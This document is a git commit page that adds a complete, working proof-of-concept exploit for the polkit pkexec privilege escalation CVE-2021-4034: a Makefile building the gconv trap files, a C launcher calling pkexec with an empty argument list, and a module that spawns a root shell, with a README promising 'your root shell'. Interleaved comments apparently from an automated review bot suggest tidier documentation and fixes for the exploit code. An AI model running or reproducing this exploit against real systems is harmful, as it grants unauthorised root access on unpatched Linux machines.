CVE-2021-4034

Davide Berardi 2022-01-26 01:03:31 +01:00
parent 1dabffa709
commit 444257e5d9
4 changed files with 55 additions and 1 deletions

19
Makefile Normal file

@ -0,0 +1,19 @@
CFLAGS=-Wall
.PHONY: all
all: pwnkit.so cve-2021-4034 gconv-modules gconvpath
.PHONY: clean
clean:
rm -rf pwnkit.so cve-2021-4034 gconv-modules GCONV_PATH=./
gconv-modules:
echo "module UTF-8// PWNKIT// pwnkit 1" > $@
.PHONY: gconvpath
gconvpath:
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
pwnkit.so: pwnkit.c
$(CC) $(CFLAGS) --shared -fPIC -o $@ $<
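Review bot: The `gconvpath` recipe creates oddly named paths with no comment explaining them: a directory literally called `GCONV_PATH=.` and, inside it, a copy of `/usr/bin/true` named `pwnkit.so:.`. A comment above the target, such as `# creates ./GCONV_PATH=./pwnkit.so:. (a copy of /usr/bin/true); with gconv-modules and pwnkit.so these are the files this PoC leaves in the working directory`, would tell a reader which artefacts to expect on disk and what `clean` is meant to remove. Separately, `all` names `cve-2021-4034` but this file has no rule for it, so the build appears to rely on make's built-in `%: %.c` rule; an explicit rule would make that dependency visible. The recipe lines are shown without a leading tab on this page, which looks like a rendering loss rather than part of the commit.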


@ -1,2 +1,6 @@
# CVE-2021-4034 # CVE-2021-4034
CVE-2021-4034 1day One day for the polkit privilege escalation exploit
Just execute `make`, `./cve-2021-4034` and enjoy your root shell.
The original advisory by the real authors is [here](https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt)

16
cve-2021-4034.c Normal file

@ -0,0 +1,16 @@
#include <unistd.h>
int main(int argc, char **argv)
{
char * const args[] = {
NULL
};
char * const environ[] = {
"pwnkit.so:.",
"PATH=GCONV_PATH=.",
"SHELL=/lol/i/do/not/exists",
"CHARSET=PWNKIT",
NULL
};
return execve("/usr/bin/pkexec", args, environ);
}
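Review bot: Nothing in this file says which pkexec behaviour it relies on, so a reader cannot tell from the source when it stops applying. The `args` array holds only `NULL`, so pkexec is started with an empty argument vector, which the Qualys advisory linked from the README describes as the condition behind CVE-2021-4034; I would add above `main` a comment like `/* PoC for CVE-2021-4034: runs pkexec with argc == 0; fixed polkit versions exit when argc < 1 */`. The same advisory notes that this technique leaves a trace in the logs (the SHELL value not being found in /etc/shells), which is worth stating in a comment next to the `SHELL=` entry for anyone using the file to validate detection. As a style point, the local array named `environ` shadows the libc global of the same name; `envp` would be clearer.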

15
pwnkit.c Normal file

@ -0,0 +1,15 @@
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void gconv(void) {
}
void gconv_init(void *step)
{
char * const args[] = { "/bin/sh", "-pi", NULL };
char * const environ[] = { "PATH=/bin:/usr/bin", NULL };
printf("%d %d\n", getuid(), geteuid());
execve(args[0], args, environ);
exit(0);
}
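Review bot: `gconv_init` carries no comment explaining that it is the initialisation hook of a gconv module and therefore runs inside whatever process loads `pwnkit.so`, which by the rest of this commit is pkexec. A short header such as `/* gconv module stub for the CVE-2021-4034 PoC: gconv_init prints uid/euid and replaces the process with /bin/sh -pi */` would let a reader, or an analyst who finds the .so on disk, see what it does without reading the advisory. The `printf` of uid and euid is not flushed before `execve`, so when stdout is not a terminal the line is lost; `fflush(stdout);` before the exec fixes that. If `execve` fails, the function falls through to `exit(0)`, which hides the error; `perror("execve"); exit(1);` would report it.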